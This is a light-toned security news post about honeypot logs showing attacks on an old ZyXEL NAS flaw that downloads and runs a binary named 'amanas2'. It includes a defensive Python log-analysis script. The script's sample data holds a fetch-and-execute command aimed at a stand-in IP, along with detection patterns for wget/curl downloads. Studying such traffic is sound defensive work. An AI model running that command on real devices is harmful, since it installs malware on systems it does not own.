Cyber Sleuths Beware: Rising Attacks on Old NAS Vulnerabilities Uncovered

In the shadowy corners of the internet, a devious URL spotted in honeypot logs reveals a sneaky exploit targeting old NAS vulnerabilities. The attacker’s modus operandi? A simple POST request aimed to execute a malicious binary dubbed “amanas2.” Despite its simplicity, this exploit’s footprint is…

Hot Take:

Just when you thought your digital storage was safe, along comes another network-attached storage (NAS) vulnerability exploit to keep cybersecurity teams on their toes. NAS devices are becoming the new playground for cybercriminals, proving yet again that no cookie (or NAS) jar is safe from their sticky fingers.

  • A newly discovered exploit targets a known vulnerability in ZyXEL NAS devices, attempting to download and execute malicious binaries.
  • The attack vector involves a POST request tricking the NAS into downloading a binary named “amanas2” from a suspicious IP.
  • Surge in exploit activity noted over a span of four days, indicating a targeted attack from a single IP address.
  • Despite the age of the vulnerability, the exploit has only recently been observed in the wild, suggesting delayed exploitation tactics.
  • Links to the VirusTotal analysis and the original vulnerability disclosure provide further insight into the threat landscape.

Need to know more?

Attack Patterns on the Rise

It seems our cyber adversaries have a calendar marked with “NAS Attack Week.” The recent logs reveal a sudden spike in attacks targeting a specific vulnerability in ZyXEL NAS devices. Imagine this as your annoying neighbor deciding to crank up the music just when you thought it was safe to relax. This exploit’s party trick? A POST request that would make any NAS weep binary tears.

A Binary Bash

The crux of this exploit revolves around a rather cheeky binary named “amanas2.” The attackers, who apparently don’t believe in subtlety, have the NAS devices download and execute this binary from a rather dubious online location. Sadly, the digital detectives couldn’t snag the file for a closer look because, much like a bad magic trick, the binary vanished before it could be examined. However, a tip of the hat to VirusTotal, which confirmed the file’s malevolent nature.

The Lone Ranger of IPs

In a plot twist worthy of a cyber-thriller, all attacks originated from a single IP address. This lone cyber cowboy rode into the digital town a few days before the attacks began, scouting the landscape and likely sizing up the local digital saloon (a.k.a. the NAS devices). The logs show a meticulous buildup to the main event, hinting at a calculated assault rather than random skirmishes.
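The pattern described above, a single source that scouts first and then sends POST requests that fetch and run a binary, can be pulled out of honeypot records with a short script. This is an added example, not from the original write-up; the log records, addresses, dates and the `/PLACEHOLDER` path are constructed, since the page gives none of them.

```python
import re
from collections import defaultdict
from datetime import date

# Constructed honeypot records: (day, source IP, method, path, body).
# Documentation-range addresses; "/PLACEHOLDER" stands in for the real URL.
BODY = "wget http://198.51.100.9/amanas2; chmod +x amanas2; ./amanas2"
SAMPLE_LOG = [
    ("2024-01-01", "203.0.113.7", "GET", "/", ""),
    ("2024-01-02", "203.0.113.7", "GET", "/", ""),
    ("2024-01-03", "192.0.2.44", "POST", "/login", "user=a&pass=b"),
] + [(f"2024-01-0{n}", "203.0.113.7", "POST", "/PLACEHOLDER", BODY)
     for n in (4, 5, 6, 7)]

# A fetch of a file from a bare IP address, and a sign that it is then run.
FETCH = re.compile(r"\b(?:wget|curl)\s+\S*?(\d{1,3}(?:\.\d{1,3}){3})/([\w.-]+)", re.I)
RUN = re.compile(r"chmod\s+\+x|\bsh\s+|\./", re.I)

def summarize(records):
    """Per source IP: first contact, first download-and-execute POST, and the gap."""
    seen, hits = {}, defaultdict(list)
    for day, src, method, _path, body in records:
        d = date.fromisoformat(day)
        seen[src] = min(seen.get(src, d), d)
        m = FETCH.search(body)
        if method == "POST" and m and RUN.search(body):
            hits[src].append((d, m.group(1), m.group(2)))
    report = {}
    for src, rows in hits.items():
        days = sorted({d for d, _, _ in rows})
        report[src] = {
            "first_seen": seen[src],
            "first_exploit": days[0],
            # Days between first contact and first exploit attempt.
            "recon_lead_days": (days[0] - seen[src]).days,
            "active_days": len(days),
            # (download host, file name) pairs to block or hunt for.
            "payloads": sorted({(h, n) for _, h, n in rows}),
        }
    return report

if __name__ == "__main__":
    for src, info in summarize(SAMPLE_LOG).items():
        print(src, info)
```
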

A Delayed Discovery

What’s fascinating here is the timing. The vulnerabilities were disclosed last year, yet it took almost a year for them to be exploited. This isn’t your run-of-the-mill “exploit the day after disclosure” scenario. No, this is more like aging a fine wine, where the cybercriminals waited patiently for the perfect moment to uncork their malicious plans. A reminder that in cybersecurity, old vulnerabilities never truly die; they just wait in the shadows.

What’s Next?

As always, staying ahead of these threats requires vigilance and patching old vulnerabilities. It’s a game of digital cat and mouse, and right now, the mice are getting pretty clever. So, keep those NAS devices patched, folks, or you might find they’re joining a conga line you never intended them to be part of!
